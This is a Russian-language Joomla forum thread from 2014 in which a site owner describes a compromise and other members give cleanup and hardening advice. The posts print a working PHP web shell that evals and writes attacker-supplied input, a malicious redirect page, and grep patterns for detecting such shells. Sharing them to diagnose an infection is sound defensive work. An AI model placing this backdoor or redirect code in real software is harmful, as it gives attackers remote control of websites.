Новости Joomla

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом провёл Евгений Сивоконь.

Читать интервью

0 Пользователей и 1 Гость просматривают эту тему.
  • 24 Ответов
  • 2839 Просмотров
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Сайт взломан
« : 06.04.2014, 12:57:01 »
меня взломали


1) в логах регулярно вижу вот такие строки, хотя кредитами не занимаюсь

Код
82.145.208.54 - - [02/Apr/2014:01:35:16 +0400] "GET /rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html HTTP/1.0" 301 295 "http://www.google.com.ua/search?q=%D0%97%D0%B0%D1%8F%D0%B2%D0%BA%D0%B0+%D0%BD%D0%B0+%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82+%D0%BD%D0%B5+%D0%BE%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D1%8E%D1%89%D0%B8%D0%BC+%D0%B2+%D0%A5%D0%B5%D1%80%D1%81%D0%BE%D0%BD%D0%B5&prmd=ivns&ei=4TA7U-KOI8SSO5W8gIAP&start=60&sa=N" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.5.33867/34.1654; U; ru) Presto/2.8.119 Version/11.10"
82.145.208.54 - - [02/Apr/2014:01:35:16 +0400] "GET /rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html HTTP/1.0" 404 28497 "http://www.google.com.ua/search?q=%D0%97%D0%B0%D1%8F%D0%B2%D0%BA%D0%B0+%D0%BD%D0%B0+%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82+%D0%BD%D0%B5+%D0%BE%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D1%8E%D1%89%D0%B8%D0%BC+%D0%B2+%D0%A5%D0%B5%D1%80%D1%81%D0%BE%D0%BD%D0%B5&prmd=ivns&ei=4TA7U-KOI8SSO5W8gIAP&start=60&sa=N" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.5.33867/34.1654; U; ru) Presto/2.8.119 Version/11.10"
82.145.208.54 - - [02/Apr/2014:01:35:17 +0400] "GET /templates/protostar/favicon.ico HTTP/1.0" 200 1406 "http://www.мойсайт.ru/rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.5.33867/34.1654; U; ru) Presto/2.8.119 Version/11.10"


при ручной проверке ссылки http://www.google.com.ua/search?q=%D0%97%D0%B0%D1%8F%D0%B2%D0%BA%D0%B0+%D0%BD%D0%B0+%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82+%D0%BD%D0%B5+%D0%BE%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D1%8E%D1%89%D0%B8%D0%BC+%D0%B2+%D0%A5%D0%B5%D1%80%D1%81%D0%BE%D0%BD%D0%B5&prmd=ivns&ei=4TA7U-KOI8SSO5W8gIAP&start=60&sa=N
моего сайта в результатах не нахожу

страницы rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html на сайте у меня не существует - тоже руками проверял.
директорию rc я обнаружил на ftp почти 2 месяца назад и сразу удалил, а похожие запросы все еще появляются, хоть и реже


2) еще у меня в лог файле много почтовых ошибок с каждого домена 

Код
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name 
sendmail: fatal: diann_moses@мойсайт.ru(1363): queue file write error
postdrop: fatal: uid=1363: day rate limit exceeded
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: fatal: diann_moses@мойсайт.ru(1363): queue file write error
postdrop: fatal: uid=1363: day rate limit exceeded
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: fatal: diann_moses@мойсайт.ru(1363): queue file write error


Такое ощущение, что эти гады как-то создают почтовые адреса на моем доменном имени и с них пытаются кому-то рассылать спам.
Хостер уже установил мне тестовый лимит в 30 писем в день. И как только есть превышение, то он блокирует функцию mail() и у меня перестает работать обратная связь с сайта!



3) уже удалил кучу непонятных index.php с вот таким содержанием:
Код
$drzqg = "37bad16411b7278d563a3aab1b9e588b"; if(isset($_REQUEST['pdmlcxc'])) { $yknb = $_REQUEST['pdmlcxc']; eval($yknb); exit(); } if(isset($_REQUEST['rywtupne'])) { $jbqommpa = $_REQUEST['fdrqg']; $shndup = $_REQUEST['rywtupne']; $mnzg = fopen($shndup, 'w'); $ptlnc = fwrite($mnzg, $jbqommpa); fclose($mnzg); echo $ptlnc; exit(); } 

чего этот файл хоть делает? я вообще не понимаю
многие файлы пока сохранил себе на локальный комп, чтобы разобраться что это такое (приложил архив в теме)


3) хостер посоветовал искать скрипты так через ssh (но у меня не получилось)
Код
find -type f -name "*.php" -print0 | xargs -0 fgrep -l 'base64_decode($_POST'
find -type f -name "*.php" -print0 | xargs -0 fgrep -l 'if (count($_POST) < 2) { die(PHP_OS.chr('
find -type f -size -1000c -name "*.php" -print0 | xargs -0 grep -il "if(isset(\$_REQUEST\[.*eval(.*)"
find -type f -name "*.php" -print0 | xargs -0 fgrep -l 'base64_decode($_REQUEST'
find -type f -size -1000c -name "*.php" -print0 | xargs -0 fgrep -l "eval(stripslashes($_REQUEST"


4) я скачал утилитку far.php для текстового поиска на хостинге и удалил кучу файлов с названиями типа 7NA_YsZ6.php, содержащих eval и base64_decode
но есть ощущение, что еще не все почищено, т.к. пару раз в неделю превышается лимит по спаму

5) поменял пароль на хостинге, поменял пароль ftp, разрешил доступ по ftp только с моего домашнего IP адреса путем помещения файла ftpaccess в корень хостинга

6) на хостинге 5 сайтов
cms prestashop - 1 шт
Joomla 1.5 - 2 шт
Joomla 3 - 1 шт (включена двухфакторная аутентификация в админке через гугль приложение для андроида)
шаблон bootstrap - маленький сайт без cms




помогите, пожалуйста, понять как меня взломали, что эти скрипты делают и как их вычистить до конца!
ну и как потом защититься
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #1 : 06.04.2014, 12:59:50 »
Залили шелл как всегда через уязвимое расширение. Теперь что хотят, то и делают. Joomla 1.5 - 2 шт - ищите тут. Вообще надо разносить сайты по разным аккаунтам. Скрипты форума в помощь. Ищите, что у вас там уязвимо.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #2 : 06.04.2014, 13:02:14 »
ну а если я сейчас ftp заблокировал и удаляю скрипты потихоньку, то они размножаться уже сами не могут?
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #3 : 06.04.2014, 13:10:59 »
Могут. Пока есть дыра.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #4 : 06.04.2014, 13:17:14 »
а как её искать?
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #5 : 06.04.2014, 13:31:51 »
Списки уязвимых расширений. Также можно воспользоватся скриптами форумчан и обычным антивирусами.
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Re: Сайт взломан
« Ответ #6 : 06.04.2014, 13:39:48 »
Цитировать
а как её искать?
Скачайте сайт на компьютер и проверьте антивирусом.
Разработка, доработка расширений для Joomla!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Сайт взломан
« Ответ #7 : 07.04.2014, 11:26:04 »
пока не разнесете сайты, не разграничите, не понимая что и как искать и где, будет просто бесполезно искать пока ищите на одном на других "рассадник", перейдете на другой искать с "рассадника" на вами уже почищенный перенесут, и так по кругу
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #8 : 07.04.2014, 11:30:26 »
Если много сайтов, прямая дорога на vds.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #9 : 12.04.2014, 22:39:39 »
сегодня нашел в некоторых папках файлы типа dsfs.html одинакового содержания

зачем они? вроде вреда от них никакого
Код
<html>
<head>                                                                                                                                                                                                                                           <meta http-equiv="refresh" content="2; url=http://vec36ru.157.com1.ru/bannerZPr/bar/index.html">
</head>
<body>
<h1>Loading...</h1>
</body>
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #10 : 12.04.2014, 23:52:40 »
Редиректы это.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #11 : 12.04.2014, 23:58:46 »
а куда?
там же пусто
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #12 : 13.04.2014, 00:39:30 »
Код
<meta http-equiv="refresh" content="2; url=http://vec36ru.157.com1.ru/bannerZPr/bar/index.html">
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #13 : 13.04.2014, 09:49:02 »
это откуда? в тех файлах, которые я нашел такого не было
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #14 : 13.04.2014, 10:02:36 »
В приведенном коде есть.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #15 : 13.04.2014, 14:35:06 »
а какие конторы можете посоветовать где купить виртуальный сервер?
и что у меня будет в распоряжении, чтобы самому повысить безопасность сайтов?

у меня сейчас 5 сайтов
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #16 : 13.04.2014, 14:41:27 »
Конторы в подписи на любой выбор. Разделение по пользователям будет. На по мощнее можно антивирус ставить.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #17 : 13.04.2014, 14:53:06 »
это все украинские хостеры, а мне надо что-нибудь в Москве.
пока нашел clodo.ru

а что дает разделение на пользователей?
и какие именно пользователи? ftp, sql или какие?
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #18 : 13.04.2014, 15:34:14 »
Не все украинские. Последний как раз в Москве.

http://www.opennet.ru/base/sys/file_access.txt.html
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #19 : 13.04.2014, 22:31:37 »
если честно - этот time-host.net доверия вообще не вызывает

1) контактные телефоны явно не российские
2) где конкретно расположены их сервера не указывают
3) на hosting101.ru всего 9 отзывов начиная с 22.01.2014
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #20 : 13.04.2014, 22:55:29 »
а что дает разделение по пользователям на VPS?
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Сайт взломан
« Ответ #21 : 13.04.2014, 22:55:55 »
Сервера у них в webdc. Телефон русский есть. В общем выбирайте, что хотите.

Ссылку скидывал. Один пользователь, не может управлять фалами другого в вкратце говоря. Поэтому если ломают один сайт, то остальные остаются. Или найдите такого хостера.
*

schel4ok

  • Захожу иногда
  • 219
  • 4 / 1
Re: Сайт взломан
« Ответ #22 : 13.04.2014, 23:05:04 »
то есть я могу наделать пользователей по количеству сайтов и каждый пользователь будет иметь права только в своей папке.
ну допустим так.

но фишка в том, что всеми сайтами физически управляю я, то есть на сервере это будет пользователь root.
и какая тогда мне польза от 5 других пользователей?

или мне надо сделать 5 пользователей и в каждый сайт заливать файлы от под разными юзерами?
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Сайт взломан
« Ответ #23 : 15.04.2014, 09:52:00 »
то есть я могу наделать пользователей по количеству сайтов и каждый пользователь будет иметь права только в своей папке.
ну допустим так.

но фишка в том, что всеми сайтами физически управляю я, то есть на сервере это будет пользователь root.
и какая тогда мне польза от 5 других пользователей?

или мне надо сделать 5 пользователей и в каждый сайт заливать файлы от под разными юзерами?
Зачем самому заворачиваться с безопасностью? Занимайтесь сайтами, контентом.
В качестве хостинга порекомендую себя http://joomlaforum.ru/index.php/topic,287401.0.html
За безопасностью слежу сам, также нахожу и закрываю дыры.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Сайт взломан
« Ответ #24 : 15.04.2014, 12:35:48 »
то есть я могу наделать пользователей по количеству сайтов и каждый пользователь будет иметь права только в своей папке.
или мне надо сделать 5 пользователей и в каждый сайт заливать файлы от под разными юзерами?
Ну да. root  для создания пользователей.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3148
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2260
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 1136
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 2283
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 7859
Последний ответ 08.01.2020, 12:52:55
от winstrool